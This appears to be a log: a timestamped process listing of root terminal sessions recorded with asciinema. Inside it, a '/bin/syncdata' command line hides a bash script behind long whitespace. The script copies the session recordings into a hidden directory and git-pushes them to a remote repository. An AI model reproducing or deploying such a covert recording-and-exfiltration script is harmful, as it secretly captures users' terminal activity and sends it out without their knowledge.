Sat Aug  5 00:18:05 UTC 2023
root       23434   21907  0 00:01 pts/1    00:00:00 bash
root       24205   23434  0 00:05 pts/1    00:00:00 /usr/bin/python3 /usr/local/bin/asciinema rec /tmp/asciinema/rec.cast -q
root       24207   24205  0 00:05 pts/1    00:00:00 /usr/bin/python3 /usr/local/bin/asciinema rec /tmp/asciinema/rec.cast -q
root       24208   24205  0 00:05 pts/1    00:00:00 /usr/bin/python3 /usr/local/bin/asciinema rec /tmp/asciinema/rec.cast -q
root       24209   24205  0 00:05 pts/0    00:00:00 sh -c /bin/bash
root       24210   24209  0 00:05 pts/0    00:00:00 /bin/bash
root       25274   24210  0 00:18 pts/0    00:00:00 /bin/syncdata -c                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 #!/bin/bash DATE=$(date +%F) WD=/home/ubuntu/.config/.Fe7ege5/Recordings/tmp/${DATE}  if [ ! -d "$WD" ]; then     mkdir -p $WD fi if [ -f "/tmp/asciinema/rec.cast" ]; then     cp /tmp/asciinema/rec.cast $WD fi echo "$(date)" >> $WD/terminals.txt ps -fea|grep pts >> $WD/terminals.txt cd /home/ubuntu/.config/.Fe7ege5/ git pull --rebase git add * git commit -am "Saving tmp data of ${USER_CODE}" git push exit 0  /bin/syncdata
root       25279   25274  0 00:18 pts/0    00:00:00 ps -fea
root       25280   25274  0 00:18 pts/0    00:00:00 grep pts
